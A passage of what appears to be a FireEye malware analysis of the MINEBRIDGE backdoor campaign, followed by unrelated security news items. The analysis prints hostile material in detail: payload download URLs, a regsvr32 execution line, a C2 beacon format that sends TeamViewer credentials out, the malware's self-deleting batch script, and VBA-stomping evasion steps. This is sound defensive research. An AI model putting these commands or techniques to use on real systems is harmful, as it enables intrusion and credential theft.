  • Emails associated with this campaign were sent from several different email addresses, though all used the recruiting-themed domain agent4career.com which was registered on January 20, 2020.
  • The subject line and message body referenced an employment candidate with experience in the financial sector.
  • The attached payload masqueraded as the resume of the same financial services candidate referenced in the phishing email.
  • Observed targeting included the financial sector exclusively.

Quit Stepping All Over My Macros

The phishing documents themselves leverage numerous interesting TTPs including hiding macros from the Office GUI, and VBA stomping.

VBA stomping is a colloquial term applied to the manipulation of Office documents where the source code of a macro is made to mismatch the pseudo-code (hereto referred to as "p-code") of the document. In order to avoid duplicating research and wasting the reader’s time, we will instead reference the impressive work of our predecessors and peers in the industry. As an introduction to the concept, we first recommend reading the tool release blog post for EvilClippy from Outflank. The security team at Walmart has also published incredible research on the methodology. Vesselin Bontchev provides a useful open source utility for dumping the p-code from an Office document in pcodedmp. This tool can be leveraged to inspect the p-code of a document separate from its VBA source. It was adopted by the wider open source analysis toolkit oletools in order to detect the presence of stomping via comparison of p-code mnemonics vs keyword extraction in VBA source.

That is a whole lot of quality reading for those interested. For the sake of brevity, the most important result of VBA stomping as relevant to this blog post is the following:

  • Static analysis tools focusing on VBA macro source extraction may be fooled into a benign assessment of a document bearing malicious p-code.
  • When VBA source is removed, and a document is opened in a version of Office for which the p-code was not compiled to execute, a macro will not execute correctly, resulting in potential failed dynamic analysis.
  • When a document is opened under a version of Office that uses a VBA version that does not match the version of Office used to create the document, VBA source code is recompiled back into p-code.
  • When a document is opened in Office and the GUI is used to view the macro, the embedded p-code is decompiled to be viewed.

The final two points identify some interesting complications in regard to leveraging this methodology more broadly. Versioning complexities arise that toolkits like EvilClippy leverage Office version enumeration features to address. An actor’s VBA stomped document containing benign VBA source but evil p-code must know the version of Office to build the p-code for, or their sample will not detonate properly. Additionally, if an actor sends a stomped document, and a user or researcher opens the macro in the Office editor, they will see malicious code.

Our actor addressed the latter point of this complication by leveraging what we assess to be another feature of the EvilClippy utility, wherein viewing the macro source is made inaccessible to a user within Office by modifying the PROJECT stream of the document. Let’s highlight this below using a publicly available sample we attribute to our actors (SHA256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e):

Document PROJECT stream:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

The above PROJECT stream has been modified. Within the PROJECT stream workspace, a module is referenced. However, there is no module defined. We would expect the unmodified PROJECT stream of this document prior to utilization of a tool to modify it to be as follows:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Module=”Module1”
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

It is interesting to note that we initially identified this actor only performing this manipulation on their malicious documents—avoiding any versioning complexities--without actually stomping the p-code to mismatch the VBA source. This seems like an odd decision and is possibly indicative of an actor assessing what “works” for their campaigns. The above malicious document is an example of them leveraging both methodologies, as highlighted by this screenshot from the awesome publicly available web service IRIS-H Digital Forensics:

We can see that the documents VBA source is a blank Sub procedure definition. A quick glance at the p-code identifies both network- based indicators and host- based indicators we can use to determine what this sample would do when executed on the proper Office version. When we attempt to open the macro in the GUI editor, Office gets angry:

For analysts looking to identify this methodology holistically, we recommend the following considerations:

  • The GUI hiding functionality results in an altered project stream wherein a module exists, but there is no module, class, or baseclass defined in the stream. This is a potential static detection.
  • While the macro source is no longer present, there are still static strings present in Module1 in this sample which may indicate Windows APIs leveraged. This is a potential static detection.

  • Utilities like the previously mentioned oletools can do all of this detection for you. If you identify false negatives, false positives, or bugs, the open source project maintainers respond to them regularly like the superheroes that they are:

The above methodology creates questions regarding potential efficiency problems for scaling any sizable campaign using it. While tools like EvilClippy provide the means to create difficult to detect malicious documents that can potentially sneak past some dynamic and static detections, their payloads have the additional burden of needing to fingerprint targets to enable successful execution. While actors with sufficient resources and creativity can no doubt account for these requirements, it is relevant to note that detections for these methodologies will likely yield more targeted activity. In fact, tertiary review of samples employing these techniques identified unrelated activity delivering both Cobalt Strike BEACON and POSHC2 payloads.

We recently expanded our internal FireEye threat behavior tree to accommodate these techniques. At the time of publication, the authors were unable to directly map the methods – PROJECT stream manipulation and VBA stomping – to existing techniques in the MITRE ATT&CK Matrix™ for Enterprise. However, our team submitted these as contributions to the ATT&CK knowledge base prior to publication and will make additional data available for ATT&CK Sightings.

Crossing The Bridge of Khazad-dûm: The MINEBRIDGE Infection Chain

Successful detonation of the previously detailed malicious document results in creation of “uCWOncHvBb.dll” via a call to URLDownloadToFileA to the URL hxxps://marendoger[.]com/team/rumba.php. The returned MINEDOOR packed MINEBRIDGE sample is saved in the executing users AppData directory (Eg: C:\Users\username\AppData\Roaming\uCWOncHvBb.dll), and then subsequent execution of the DllRegisterServer export via invocation of “regsvr32.exe /s %AppData%\uCWOncHvBb.dll” occurs:

This will result in a ZIP file being retrieved from the URL hxxps://creatorz123[.]top/~files_tv/~all_files_m.bin using the Windows API URLDownloadToFileW. The ZIP file is written to %TEMP%, unzipped to the newly created directory %AppData%\Windows Media Player, and then deleted:

The ZIP file contains legitimate files required to execute a copy of TeamViewer, listed in the file creation area of the IOC section of this post. When a file named TeamViewer.exe is identified while unzipping, it is renamed to wpvnetwks.exe:

After completing these tasks, uCWOncHvBb.dll moves itself to %AppData%\Windows Media Player\msi.dll. The phishing macro then closes the handle to msi.dll, and calls CreateProcessA on wpvnetwks.exe, which results in the renamed TeamViewer instance side-loading the malicious msi.dll located alongside it. The malware ensures its persistence through reboot by creating a link file at %CISDL_STARTUP%\Windows WMI.lnk, which points to %AppData%\Windows Media Player\wpnetwks.exe, resulting in its launch at user logon.

The end result is a legitimate, though outdated (version 11, compiled on September 17, 2018, at 10:30:12 UTC), TeamViewer instance hijacked by a malicious sideloaded DLL (MINEBRIDGE).

MINEBRIDGE is a 32-bit C++ backdoor designed to be loaded by an older, unpatched instance of the legitimate remote desktop software TeamViewer by DLL load-order hijacking. The backdoor hooks Windows APIs to prevent the victim from seeing the TeamViewer application. By default, MINEBRIDGE conducts command and control (C2) communication via HTTPS POST requests to hard-coded C2 domains. The POST requests contain a GUID derived from the system’s volume serial number, a TeamViewer unique id and password, username, computer name, operating system version, and beacon interval. MINEBRIDGE can also communicate with a C2 server by sending TeamViewer chat messages using a custom window procedure hook. Collectively, the two C2 methods support commands for downloading and executing payloads, downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, executing arbitrary shell commands, process elevation, turning on/off TeamViewer's microphone, and gathering system UAC information.

MINEBRIDGE’s default method of communication is sending HTTPS POST requests over TCP port 443. This method of communication is always active; however, the beacon-interval time may be changed via a command. Before sending any C2 beacons, the sample waits to collect the TeamViewer generated unique id (<tv_id>) and password (<tv_pass>) via SetWindowsTextW hooks.

This specific sample continuously sends an HTTP POST request over TCP port 443 with the URI ~f83g7bfiunwjsd1/g4t3_indata.php to each host listed below until a response is received.

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

The POST body contains the formatted string uuid=<guid>&id=<tv_id>&pass=<tv_pass>&username=<user_name>&pcname=<comp_name>&osver=<os_version>&timeout=<beacon_interval> where <guid> is a GUID derived from the system's volume serial number and formatted using the format string %06lX-%04lX-%04lX-%06lX. Additionally, the request uses the hard-coded HTTP User-Agent string "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

After a response is received, it's processed for commands. A single response may contain multiple commands. For each command executed, the sample sends an HTTPS POST request over TCP port 443 indicating success or failure. The sample responds to the commands below.

Command

Description

drun

Download and execute an executable from a URL provided in the command. File saved to %TEMP%\<32_rand_chars>.exe.

rundll_command

Download a custom XOR-encoded and LZNT1 compressed DLL from a URL provided in the command and save to %TEMP%\<32_rand_chars>. Decode, decompress, and load the DLL in memory and call its entrypoint.

update_command

Move sample file to <sample_name>.old and download a new version of itself to <sample_name> where <sample_name> is the name of this sample (i.e., msi.dll). Relaunch the hosting TeamViewer application with command-line argument COM1_. Delete <sample_name>.old.

restart_command

Relaunch the hosting TeamViewer application with command-line argument COM1_.

terminate_command

Terminate the hosting TeamViewer application.

kill_command

Create and execute the self-deleting batch script tvdll.cmd to delete all unzipped files as well as the sample file. Terminate the hosting TeamViewer application.

poweroff_command

Shutdown the system.

reboot_command

Reboot the system.

setinterval_command

Update the C2 beacon-interval time.

After executing all commands in the response, the sample sleeps for the designated C2 beacon-interval time. It repeats the process outlined above to send the next C2 beacon. This behavior repeats indefinitely.

The self-deleting batch script tvdll.cmd contains the following content where <renamed_TeamVeiwer> is the renamed TeamViewer executable (i.e., wpvnetwks.exe) and <sample_name> is the name of this sample (i.e., msi.dll).

@echo off
ping 1.1.1.1 -n 1 -w 5000 > nul
goto nosleep1
:redel1
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep1
attrib -a -h -s -r %~d0%~p0TeamViewer_Resource_en.dll
del /f /q %~d0%~p0TeamViewer_Resource_en.dll
if exist  "%~d0%~p0TeamViewer_Resource_en.dll" goto redel1
goto nosleep2
:redel2
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep2
attrib -a -h -s -r %~d0%~p0TeamViewer_StaticRes.dll
del /f /q %~d0%~p0TeamViewer_StaticRes.dll
if exist  "%~d0%~p0TeamViewer_StaticRes.dll" goto redel2
goto nosleep3
:redel3
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep3
attrib -a -h -s -r %~d0%~p0TeamViewer_Desktop.exe
del /f /q %~d0%~p0TeamViewer_Desktop.exe
if exist  "%~d0%~p0TeamViewer_Desktop.exe" goto redel3
goto nosleep4
:redel4
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep4
attrib -a -h -s -r %~d0%~p0TeamViewer.ini
del /f /q %~d0%~p0TeamViewer.ini
if exist  "%~d0%~p0TeamViewer.ini" goto redel4
goto nosleep5
:redel5
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep5
attrib -a -h -s -r %~d0%~p0<sample_name>
del /f /q %~d0%~p0<sample_name>
if exist  "%~d0%~p0<sample_name>" goto redel5
goto nosleep6
:redel6
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep6
attrib -a -h -s -r %~d0%~p0<renamed_TeamVeiwer>
del /f /q %~d0%~p0<renamed_TeamVeiwer>
if exist  "%~d0%~p0<renamed_TeamViewer>" goto redel6
attrib -a -h -s -r %0
del /f /q %0

Possible Connection to Another Intrusion Set

The identified MINEBRIDGE samples have been packed within a loader we call MINEDOOR. Since Fall 2019, we’ve observed a group publicly tracked as TA505 conducting phishing campaigns that use MINEDOOR to deliver the FRIENDSPEAK backdoor. The combination of MINEDOOR and FRIENDSPEAK has also been publicly discussed using the name Get2.

The limited overlap in tactics, techniques, and procedures (TTPs) between campaigns delivering MINEBRIDGE and those delivering FRIENDSPEAK may suggest that MINEDOOR is not exclusive to TA505. Recent campaigns delivering FRIENDSPEAK have appeared to use spoofed sender addresses, Excel spreadsheets with embedded payloads, and campaign-specific domains that masquerade as common technology services. Meanwhile, the campaigns delivering MINEBRIDGE have used actor-controlled email addresses, malicious Word documents that download payloads from a remote server, and domains with a variety of themes sometimes registered weeks in advance of the campaign. The campaigns delivering MINEBRIDGE also appear to be significantly smaller in both volume and scope than the campaigns delivering FRIENDSPEAK. Finally, we observed campaigns delivering MINEBRIDGE on Eastern Orthodox Christmas when Russian-speaking actors are commonly inactive; we did not observe campaigns delivering FRIENDSPEAK during the week surrounding the holiday and language resources in the malware may suggest TA505 actors speak Russian.

It is plausible that these campaigns represent a subset of TA505 activity. For example, they may be operations conducted on behalf of a specific client or by a specific member of the broader threat group. Both sets of campaigns used domains that were registered with Eranet and had the registrant location “JL, US” or “Fujian, CN,” however this overlap is less notable because we suspect that TA505 has used domains registered by a service that reuses registrant information.

Post-compromise activity would likely reveal if these campaigns were conducted by TA505 or a second threat group, however, FireEye has not yet observed any instances in which a host has been successfully compromised by MINEBRIDGE. As such, FireEye currently clusters this activity separately from what the public tracks as TA505.

Acknowledgments

FireEye would like to thank all the dedicated authors of open source tooling and research referenced in this blog post. Further, FireEye would like to thank TeamViewer for their collaboration with us on this matter. The insecure DLL loading highlighted in this blog post was resolved in TeamViewer 11.0.214397, released on October 22, 2019, prior to the TeamViewer team receiving any information from FireEye. Additionally, TeamViewer is working to add further mitigations for the malware’s functionality. FireEye will update this post with further data from TeamViewer when this becomes available.

Indicators of Compromise (IOCs)

Suspicious Behaviors
  • Process lineage: Microsoft Word launching TeamViewer
  • Directory Creation: %APPDATA%\Windows Media Player
  • File Creation:
    • %APPDATA%\Windows Media Player\msi.dll
    • %APPDATA%\Windows Media Player\msi.dll.old
    • %APPDATA%\Windows Media Player\tvdll.cmd
    • %APPDATA%\Windows Media Player\wpvnetwks.exe
    • %APPDATA%\Windows Media Player\TeamViewer_Resource_en.dll
    • %APPDATA%\Windows Media Player\TeamViewer_StaticRes.dll
    • %APPDATA%\Windows Media Player\TeamViewer_Desktop.exe
    • %APPDATA%\Windows Media Player\TeamViewer.ini
    • %CSIDL_STARTUP%\Windows WMI.lnk
    • %CSIDL_PROFILE%\<dll_name>.xpdf
    • %TEMP%\<32 random characters>
    • %TEMP%\<32 random characters>.exe
    • %TEMP%\~8426bcrtv7bdf.bin
  • Network Activity:
    • HTTPS Post requests to C2 URLs
    • User-Agent String: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

C2 Domains

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top
Download Domains
  • neurogon[.]com
  • tiparcano[.]com
  • seigortan[.]com
  • marendoger[.]com
  • badiconreg[.]com
Sender Domains
  • pt-cpaaccountant[.]com
  • rogervecpa[.]com
  • agent4career[.]com
  • bestrecruitments[.]com
Phishing Documents

MD5

SHA256

01067c8e41dae72ce39b28d85bf923ee

80e48391ed32e6c1ca13079d900d3afad62e05c08bd6e929dffdd2e3b9f69299

1601137b84d9bebf21dcfb9ad1eaa69d

3f121c714f18dfb59074cbb665ff9e7f36b2b372cfe6d58a2a8fb1a34dd71952

1c883a997cbf2a656869f6e69ffbd027

de7c7a962e78ceeee0d8359197daeb2c3ca5484dc7cf0d8663fb32003068c655

2ed49bd499c9962e115a66665a6944f6

b8f64a83ad770add6919d243222c62471600e64789264d116c560b7c574669ec

3b948368fe1a296f5ed18b11194ce51c

999d4f434bbc5d355656cc2a05982d61d6770a4c3c837dd8ec6aff8437ae405a

4148281424ff3e85b215cd867746b20c

9812123d2367b952e68fa09bd3d1b3b3db81f0d3e2b3c03a53c21f12f1f4c889

54f22fbc84f4d060fcbf23534a02e5f6

7b20e7e4e0b1c0e41de72c75b1866866a8f61df5a8af0ebf6e8dbd8f4e7bdc57

5a3d8348f04345f6687552e6b7469ac1

77a33d9a4610c4b794a61c79c93e2be87886d27402968310d93988dfd32a2ccf

607d28ae6cf2adb87fcb7eac9f9e09ab

f3917832c68ed3f877df4cd01635b1c14a9c7e217c93150bebf9302223f52065

9ba3275ac0e65b9cd4d5afa0adf401b4

18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e

9becd2fd73aa4b36ad9cd0c95297d40b

30025da34f6f311efe6b7b2c3fe334f934f3f6e6024e4d95e8c808c18eb6de03

9cce3c9516f0f15ce18f37d707931775

bf0adb30ca230eee6401861e1669b9cfeaa64122cc29c5294c2198f2d82f760e

9faf9e0c5945876c8bad3c121c91ea15

88c4019e66564ad8c15b189b903276910f9d828d5e180cac30f1f341647278fc

a37e6eeb06729b6108649f21064b16ef

e895dc605c6dcaf2c3173b5ec1a74a24390c4c274571d6e17b55955c9bd48799

ab8dc4ba75aad317abb8ee38c8928db0

212793a915bdd75bede8a744cd99123e2a5ac70825d7b2e1fc27104276a3aafd

b8817253288b395cb33ffe36e0072dc9

ba013420bd2306ecb9be8901db905b4696d93b9674bd7b10b4d0ef6f52fbd069

cb5e5d29f844eb22fecaa45763750c27

4ff9bfde5b5d3614e6aa753cacc68d26c12601b88e61e03e4727ee6d9fe3cdc2

cffda37453e1a1389840ed6ebaef1b0d

c9f6ba5368760bf384399c9fd6b4f33185e7d0b6ea258909d7516f41a0821056

dc0e1e4ec757a777a4d4cc92a8d9ef33

ac7e622e0d1d518f1b002d514c348a60f7a7e7885192e28626808a7b9228eab6

e5c7e82670372e3cf8e8cab2c1e6bc17

eba3c07155c47a47ee4d9b5201f47a9473255f4d7a6590b5c4e7b6e9fc533c08

f93062f6271f20649e61a09c501c6c92

3f4f546fba4f1e2ee4b32193abcaaa207efe8a767580ab92e546d75a7e978a0b

MINEBRIDGE/MINEDOOR Samples

MD5

SHA256

05432fc4145d56030f6dd6259020d16c

182ccc7f2d703ad732ffee0e1d9ae4ae5cf6b8817cc33fd44f203d31868b1e97

0be9911c5be7e6dfeaeca0a7277d432b

65ead629a55e953b31668aac3bd373e229c45eb1871d8466f278f39ebcd5d26b

0dd556bf03ecb42bf87d5ea7ce8efafe

48f6810e50d08c2631f63aae307a7724dba830430f5edd4b90b4b6a5b3c3ca85

15edac65d5b5ed6c27a8ac983d5b97f6

03ff2b3067aa73ecd8830b6b0ea4f7cfa1c7476452b26227fb433265e7206525

1e9c836f997ddcbd13de35a0264cf9f1

23da418912119a1358c9a1a4671ba60c396fff4c4de225fe6a225330147549a7

21aa1066f102324ccc4697193be83741

86d839e1d741445f194965eee60d18bd292bec73e4889089e6caf9877581db12

22b7ddf4983d6e6d84a4978f96bc2a82

fc39cb08cae90c661e00718e2a0051b5de3dcb7cddde919b9ffd2d79bf923d1f

2333fbadeea558e57ac15e51d55b041c

57671d5154e707da0ee6139485f45a50fa9221852ebb65781d45a2660da7d0cb

2b9961f31e0015cbcb276d43b05e4434

e41b89869c2b510c88acd1ed9fd4a6dfe89222a81c6c1241a69af3b7f812f712

2c3cb2132951b63036124dec06fd84a8

b6dbb902125e7bf6f6701b654cbff4abaf2e853441cf34045ac19eff5ed8ce84

4de9d6073a63a26180a5d8dcaffb9e81

7b1d4774176976ffcb2075889557f91a43c05fb13f3bc262bbaec4d7a0a827e6

505ff4b9ef2b619305d7973869cd1d2b

abb05ba50f45742025dd4ebff2310325783da00fb7bc885783e60a88c5157268

52d6654fe3ac78661689237a149a710b

d6a0e62fe53116c9b5bccd2a584381e2ca86e35490d809ce1900603d5e6b53eb

53e044cd7cea2a6239d8411b8befb4b7

6e76d648d446e6a70acdd491f04c52d17f9f0e1ef34890c6628c4f48725b47c8

5624c985228288c73317f2fa1be66f32

99559a5f06b0279ed893d2799b735dae450a620f6cea2ea58426d8b67d598add

598940779363d9f4203fbfe158d6829b

1358b0ccae9dbb493228dc94eb5722c8d34c12227a438766be83df8c1c92a621

60bdea2c493c812428a8db21b29dd402

383c86deed8797e0915acf3e0c1b6a4142c2c5ecb5d482517ed2ade4df6f36fd

681a77eba0734c0a17b02a81564ae73f

0aaa66dc983179bffdb181079f3b786b6cd587c38c67ba68b560db0bd873278a

6b7d9268c7000c651473f33d088a16bd

6e39ffecab4ca0bd7835a2e773ebfc3f6d909a0a680f898e55f85ed00728666d

6d6f50f7bba4ae0225e9754e9053edc0

ddf33eff293ffc268dfd0a33dddef97aefe9e010ec869dc22c221d197eb85740

6de77c1b4e8abaaf304b43162252f022

8f50ddc1519e587597882a6bd0667653c36a8064b56ee5ff77665db2faf24710

7004fadfa572d77e24b33d2458f023d1

cccd6b46f950caec5effdd07af339be78691974fec5f25d923932b35edb95c4a

71988460fd87b6bff8e8fc0f442c934b

8167d41ad30f5d451791878815e479965b2f5213231f26819ecaf4fcc774ab12

722981703148fa78d41abbae8857f7a2

a3070ee10dd5bcd65a45b72848c926db2602e5297641452edff66e7133cdce9c

818f7af373d1ec865d6c1b7f59dc89e5

cbe4b73c0c95c207ccde9d9bd80f541cf90cad18ba5abc3fe66a811ead1601c2

832052b0f806f44b92f6ef150573af81

e162a70a6e27fe23379d3a17a3a727d85a94b79416d81ec3b4ea80d329e96830

836125ae2bed57be93a93d18e0c600e8

0fbde653bef4642626f2996a41a15a635eb52cd31eacce133d28301b902d67df

86d60bce47c9bb6017e3da26cab50dcf

6c134908ad74dfa1468a1166e7d9244695f1ffeff68bfd4eec4b35820b542b8a

8919458aec3dcc90563579a76835fc54

aad0537924bacddd0d5872f934723e765dbb182f2804c6f594f9b051937495ec

8d7e220af48fceee515eb5e56579a709

3eefa7072344e044c0a6abb0030f3f26065bf6a86bb50ea38473dd7ac73904fb

91b8ec04d8b96b90ea406c7b98cc0ad6

0520e68a4b73c3b41e566cf07be54e1f1cb59c59c303fe3390e0687f9af1a58a

959eb0696c199cbf60ec8f12fcf0ea3c

ccb5f8734befd6ab218513e16a57679a8fb43b2732e19233ee920d379045e318

95ec5e8d87111f7f6b2585992e460b52

3f8e38ccf71f122b65fdc679db13e3de3bb4b4fc04b8ab6f955d02e0bca10fae

9606cf0f12d6a00716984b5b4fa49d7d

f4f062fd7b98365ed6db993b1da586dd43e5cdcc2f00a257086734daf88c9abb

9f7fed305c6638d0854de0f4563abd62

6c5f72ddf0262838a921107520cdc12ba8e48dbafab4a66732a350095dd48e9f

a11c0b9f3e7fedfe52b1fc0fc2d4f6d1

d35ac29ea6e064b13d56f6a534022f253cf76b98e10a7ea1cbfa086eefd64f4b

a47915a2684063003f09770ba92ccef2

7b16ce0d2443b2799e36e18f60fe0603df4383b1a392b0549c3f28159b1ca4d4

a917b2ec0ac08b5cde3678487971232a

8578bff803098bf5ca0d752d0a81f07659688a32cbfc946728e5ab0403f5c4ba

ad06205879edab65ed99ed7ff796bd09

d560f8717f4117d011f40c8880081d02d1455a41c93792e1600799d3e5ee9421

ad910001cb57e84148ef014abc61fa73

c9a6f7b0603779690c1d189850403f86608a3c5e1cd91e76fd31c4f119ae256b

b1ce55fca928cf66eaa9407246399d2c

c6214ec7909ce61d6ec3f46f5a7ec595d8cc8db48965c5baee8a346632cbe16d

b9249e9f1a92e6b3359c35a8f2a1e804

0695e5e49a297c980b96f76bf10e5540de188d6a6a162e38f475418d72a50032

bd6880fb97faceecf193a745655d4301

23840c587e4e9588b3d0795d4d76a4f3d4d5b2e665ce42dde0abcd1e0a2ba254

be2597a842a7603d7eb990a2135dab5e

6288d3de1f1aa05fa0a5f0c8eb9880d077f034fc79fc20f87cbfcc522aa803cb

cf5470bfe947739e0b4527d8adb8486a

6357fdb8f62948d489080b61caf135e6aaba32dcdb7dc49b0efafef178b3b54f

d593b7847ec5d18a7dba6c7b98d9aebf

5df3a6afb1a56fa076c6db716d5a050455158941ec962546a8799fc80ccfa573

d7ee4ffce21325dfe013b6764d0f8986

92e94482dee75261c8ebdcbb7ace382a097cca11bcdc675bbe2d7b3f67525f84

de4d7796006359d60c97a6e4977e4936

ee8ba1c5329d928d542bfa06eec2c0a3e3b97dcc20382ddbc27bc420ceaeb677

e0069cd3b5548f9fd8811adf4b24bf2e

6046d6aed3f4ee2564d6be540d46bcdc0bebce11a1ced4b9ddbfa1a41084411c

e1ea93fa74d160c67a9ff748e5254fe0

92c10ef23209e09abb17e41d67301f0e3f7d9e7ddfc7c1a66140c4986d72bee7

ea15d7944c29f944814be14b25c2c2b1

5898b41ca4f4777ad04d687f93548129ccb626d2f5e6e100b0a037c3d40a7444

f22a4abd5217fa01b56d064248ce0cc5

858b4070f8b83aa43fd6a5189a8ed226ce767a64972db893e36550a25b20be94

f3cb175e725af7f94533ecc3ff62fa12

5a5385df469459cd56f6eecbf4b41b8c75aa17220c773501eaec22731f3a41bb

f6533e09a334b9f28136711ea8e9afca

9136c36ccd0be71725e8720a6cfdbdd38d7eea3998228c69ed4b52e78ba979c4

f7daaea04b7fe4251b6b8dabb832ee3a

6abd90d718113482a5bcd36e35b4ea32c469f94fc2cfb9c1c98214efbf64c352

fb1555210d04286c7bcb73ca57e8e430

36da56815dc0c274fc8aacdfffbc4d5e500025ccd1147cad513d59b69ab9557d

 

Google software glitch sent some users’ videos to strangers

Bug affected users of Google Takeout exporting from Google Photos in late November

Google has said a software bug resulted in some users’ personal videos being emailed to strangers.

The flaw affected users of Google Photos who requested to export their data in late November. For four days the export tool wrongly added videos to unrelated users’ archives.

Continue reading...

NIST Offers Strategies to Help Businesses Secure Their Cyber Supply Chains

Reducing the cybersecurity risk to one of the most vulnerable aspects of commerce — global supply chains — is the goal of a new publication by the National Institute of Standards and Technology (NIST), whose computer security experts have distilled a set of effective risk management techniques into a draft guidebook for businesses. NIST is seeking public comment on the draft for the next 30 days. Key Practices in Cyber Supply Chain Risk Management (Draft NISTIR 8276) provides a set of strategies to help businesses address the cybersecurity issues posed by modern information and communications

Election Website Security: Protect Your Vote in 2020

The 2020 U.S. presidential primaries are right around the corner. As people gear up to cast their ballots for party candidates, they may not realize that website security shortcomings could leave the U.S. elections susceptible to digital disinformation campaigns or possibly worse seeking to influence and /or manipulate the democratic process.

McAfee recently conducted a survey of county websites and county election administration websites in the 13 states projected as battleground or “tossup” states in the U.S. presidential elections in November. According to the survey results, the majority of these websites lacked official U.S. government .GOV website validation and HTTPS website security measures to prevent hackers from launching fake websites disguised as legitimate county government sites.

Got .GOV?

You might be wondering what the significance of a .gov website domain is. Well, a .gov website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

On the other hand, a website using a .COM, .NET, .ORG, or .US can be purchased by anyone with a credit card from any number of legitimate website domain vendors. The lack of a .GOV in a website name means that no controlling government authority has validated that the website is a legitimate government site.

HTTPS: browse the web securely

In the same vein as a .GOV web domain, HTTPS and a lock icon in the address of a website helps establish its validity. When a visitor sees these icons, it means that their browser has made a secure connection with the website, which means the website and the user can be confident of who they are sharing information with.

This means that any personal voter registration information that a user shares with the site cannot be intercepted and stolen by hackers while they are on the site. Additionally, HTTPS and a lock icon tell the user that they cannot be re-routed without their knowledge to a different site.

How this could impact elections

Hackers typically look to carry out their attacks with the least amount of effort and the fewest resources. Instead of hacking into local voting systems and changing vote counts, hackers could conduct a digital disinformation campaign to influence voter behavior during the elections. These attacks would seek to suppress or disrupt the voting process by setting up bogus websites with official sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.

Example disinformation email:

On top of that, social media promotions could be used to lure voters to the fake websites and provide them with the same false information.

By telling voters that they should register to vote in the wrong places, or merely vote at the wrong times, the hackers could misdirect, confuse, and frustrate voters on election day. This could ultimately impact vote counts or at least undermine voter confidence in the electoral process.

Survey results

McAfee’s survey of the external security measures for county election websites included Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

Our research found that Minnesota and Texas ranked the lowest among the surveyed states in terms of .GOV county coverage with 4.6% and 5.1% coverage respectively. Arizona ranked the highest in .GOV county coverage with 66.7%. Yet, this still left a third of the state’s counties uncovered.

Texas ranked the lowest in terms of HTTPS protection with only 22.8% of its county websites protected. Arizona again led in county HTTPS protection with 80.0%, followed by Nevada (75.0%), Iowa (70.7%), Michigan (65.1%), and Wisconsin (63.9%). Again, these “leader” states still lacked HTTPS coverage for approximately a third of their counties.

Tips to help secure your vote

So, what can citizens do to help protect their votes and the electoral system overall leading up to the 2020 election? Check out these tips to securely cast your ballot:

  • Stay informed. Remind yourself to confirm the site you are visiting is a .GOV website and that HTTPS security protection is in place to ensure that the information accurate and is safe.
  • Look out for suspicious emails. Carefully scrutinize all election related emails. An attacker seeking to misinform can use phishing-techniques to accomplish their objective.  McAfee’s general warnings related to phishing emails (e.g. here), where an attacker can create emails that look as if they come from legitimate sources are applicable.
  • Go directly to the source. If in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day.
  • Keep it old school. Trust the official voting literature sent through the traditional mail first, as the U.S. Postal Service is the primary channel state and local governments use to send out voting information.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election Website Security: Protect Your Vote in 2020 appeared first on McAfee Blogs.

U.S. Battleground County Website Security Survey

Today McAfee released the results of a survey of county websites and county election administration websites in the 13 states projected as battleground states in the 2020 U.S. presidential elections. We found that significant majorities of these websites lacked the official government .GOV website validation and HTTPS website security measures to prevent malicious actors from launching copycat web domains posing as legitimate county government sites.

These shortcomings could make it possible for malicious actors to spread false and misleading election information through mass bulk email and website promotion campaigns that could suppress, misdirect, or otherwise disrupt Election Day proceedings in such a way that they could impact the number of votes cast and, ultimately, perhaps impact the results of the 2020 U.S. elections.

Why .GOV & HTTPS?

Whereas websites using .COM, .NET, .ORG, and .US in their names are easily accessible to anyone with a credit card from website domain vendors such as GoDaddy.com, acquiring a .GOV website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

